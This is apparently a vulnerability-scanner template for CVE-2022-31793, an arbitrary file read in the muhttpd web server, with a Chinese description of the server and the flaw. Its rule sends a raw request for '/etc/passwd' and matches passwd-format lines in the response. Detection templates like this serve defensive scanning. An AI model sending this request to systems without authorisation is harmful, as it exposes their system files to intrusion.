id: CVE-2022-31793
info:
name: muhttpd 任意文件读取漏洞
author: zan8in
severity: high
description: |-
muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。
muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件
"2017 ARRIS Enterprises,"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
tags: cve,cve2022,muhttpd,arbitraryfileread,traversal,rce
created: 2023/06/23
set:
hostname: request.url.host
rules:
r0:
request:
raw: |
GET a/etc/passwd HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()